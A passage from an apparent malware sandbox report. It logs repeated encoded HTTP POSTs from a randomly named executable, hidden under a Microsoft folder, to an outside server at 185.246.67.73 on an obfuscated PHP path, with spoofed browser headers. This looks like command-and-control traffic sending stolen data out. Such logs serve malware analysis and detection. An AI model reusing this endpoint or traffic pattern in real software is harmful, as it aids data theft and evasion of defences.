                                                                                                                      Dec 8, 2024 15:28:31.403992891 CET2584OUTData Raw: 55 5f 43 54 5b 47 55 54 54 5e 50 59 5b 5d 59 5d 59 59 59 5b 57 51 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_CT[GUTT^PY[]Y]YYY[WQQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[-Z%X!!9'5486/^/'./201&*^ Z<;+ ]!![ 4
                                                                                                                      Dec 8, 2024 15:28:32.369805098 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:32.608395100 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:32 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.449881185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:32.846945047 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2576
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:33.200897932 CET2576OUTData Raw: 50 5f 43 56 5b 44 55 51 54 5e 50 59 5b 58 59 5b 59 54 59 59 57 53 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_CV[DUQT^PY[XY[YTYYWSQXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.3=%Z#0)Z:B6]#8:Y,(V$=;&)12\ /8 ]!![
                                                                                                                      Dec 8, 2024 15:28:34.203406096 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:34.442789078 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:33 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      53192.168.2.449883185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:34.674662113 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:35.028986931 CET2584OUTData Raw: 50 58 46 57 5b 43 55 50 54 5e 50 59 5b 5d 59 52 59 58 59 5d 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PXFW[CUPT^PY[]YRYXY]WUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^'Y%*)!29$:4=8^<S$-8Y&V6_%;"X#<, ]!![ 4
                                                                                                                      Dec 8, 2024 15:28:36.024429083 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:36.256392956 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:35 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      54192.168.2.449889185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:36.496345043 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:36.841520071 CET2584OUTData Raw: 55 59 46 50 5e 45 50 54 54 5e 50 59 5b 51 59 5d 59 5d 59 56 57 5c 51 58 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFP^EPTT^PY[QY]Y]YVW\QXYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.'=5X$)&!>.! 58,0.+' Y1;>X",.; ]!![


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      55192.168.2.449895185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:37.717827082 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:38.075958014 CET1904OUTData Raw: 50 5a 43 5d 5e 47 55 51 54 5e 50 59 5b 5d 59 53 59 58 59 57 57 5d 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PZC]^GUQT^PY[]YSYXYWW]Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'-1)>5*.76\#(>X.8$T'=?&)'+144; ]!![ 4
                                                                                                                      Dec 8, 2024 15:28:39.035151005 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:39.268614054 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:38 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 09 25 43 37 55 3d 2a 2a 5c 25 3c 2c 07 30 06 23 5b 29 1e 09 5a 24 29 3c 19 2f 3a 24 0d 23 12 01 07 33 3d 20 5d 35 3c 20 0a 2d 12 20 5a 06 10 21 5e 24 2f 34 00 2b 05 2d 5c 26 28 3d 45 35 19 2b 07 24 03 05 55 3f 2a 2d 03 34 06 37 57 32 04 29 56 3a 25 31 04 32 20 2b 50 27 36 2c 55 0f 1f 25 0b 30 0b 23 53 23 0e 25 0f 20 33 3b 5c 32 1b 2a 1a 35 01 3c 18 28 3e 24 5e 3f 0b 27 03 20 0c 27 5e 2c 28 3a 06 2a 31 37 57 30 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :%C7U=**\%<,0#[)Z$)</:$#3= ]5< - Z!^$/4+-\&(=E5+$U?*-47W2)V:%12 +P'6,U%0#S#% 3;\2*5<(>$^?' '^,(:*17W0< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      56192.168.2.449896185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:37.837368011 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:38.185285091 CET2584OUTData Raw: 50 53 43 55 5b 48 50 54 54 5e 50 59 5b 5e 59 5b 59 54 59 5c 57 51 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSCU[HPTT^PY[^Y[YTY\WQQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[$=6$)-!U"94%7;%,30.('0&8:]"<,; ]!![ 8
                                                                                                                      Dec 8, 2024 15:28:39.168108940 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:39.400542021 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:38 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      57192.168.2.449902185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:39.642569065 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:39.997936964 CET2584OUTData Raw: 55 59 46 51 5e 42 55 52 54 5e 50 59 5b 51 59 5d 59 5e 59 5e 57 53 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFQ^BURT^PY[QY]Y^Y^WSQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$5[%9[6 >:"\"8).;#'>'&V.]1:_"/7_;; ]!![
                                                                                                                      Dec 8, 2024 15:28:40.965383053 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:41.200793028 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:40 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      58192.168.2.449908185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:41.444286108 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:41.794598103 CET2584OUTData Raw: 50 5e 43 56 5b 46 55 56 54 5e 50 59 5b 5c 59 5a 59 54 59 58 57 54 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P^CV[FUVT^PY[\YZYTYXWTQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3[=[&_)50*-$:] 8X/ 0>20"X&(>\"<7;+ ]!![ 0
                                                                                                                      Dec 8, 2024 15:28:42.768253088 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:43.000971079 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:42 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      59192.168.2.449909185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:43.237008095 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:43.591629028 CET2580OUTData Raw: 50 53 46 51 5e 45 55 52 54 5e 50 59 5b 58 59 5e 59 5e 59 56 57 52 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSFQ^EURT^PY[XY^Y^YVWRQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'..$).!3",'& :^,<%.8%5%1 <'\/ ]!![ 4


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      60192.168.2.449915185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:44.401792049 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:44.747765064 CET1904OUTData Raw: 55 59 46 57 5b 46 55 54 54 5e 50 59 5b 5a 59 58 59 54 59 59 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFW[FUTT^PY[ZYXYTYYWQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-35^%%" )[-454>^/8$U'>8X%*^&: 7^, ]!![ (
                                                                                                                      Dec 8, 2024 15:28:45.723938942 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:45.957278013 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:45 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 09 25 43 33 53 3e 5c 2e 5d 27 3c 3b 58 27 3b 23 16 29 30 3b 5f 24 17 30 5e 2c 04 30 0f 21 3f 28 5f 33 04 30 59 20 2c 2c 0a 2e 02 20 5a 06 10 22 07 32 06 2c 02 3c 38 3d 14 31 01 3a 18 21 24 3b 42 27 04 2b 18 3f 2a 04 15 37 11 2c 0a 27 2d 2e 0e 2d 1c 3d 05 32 33 2b 57 25 0c 2c 55 0f 1f 25 09 27 0b 27 1e 22 37 3a 1c 22 30 34 05 25 0b 00 56 22 2f 30 51 2b 2d 2b 06 28 21 28 58 22 32 3c 06 3a 3b 25 5e 2a 22 2f 50 25 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :%C3S>\.]'<;X';#)0;_$0^,0!?(_30Y ,,. Z"2,<8=1:!$;B'+?*7,'-.-=23+W%,U%''"7:"04%V"/0Q+-+(!(X"2<:;%^*"/P%< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      61192.168.2.449916185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:44.525981903 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:44.872741938 CET2584OUTData Raw: 50 5c 46 56 5e 47 55 50 54 5e 50 59 5b 5f 59 58 59 5d 59 5b 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P\FV^GUPT^PY[_YXY]Y[WQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3>6&!)Z9'%7>[,8U$>1!&;"Y7,;^, ]!![
                                                                                                                      Dec 8, 2024 15:28:45.853246927 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:46.088808060 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:45 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      62192.168.2.449922185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:46.331614017 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:46.685286045 CET2584OUTData Raw: 50 5b 43 5c 5e 43 55 5f 54 5e 50 59 5b 5b 59 52 59 54 59 5e 57 5d 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
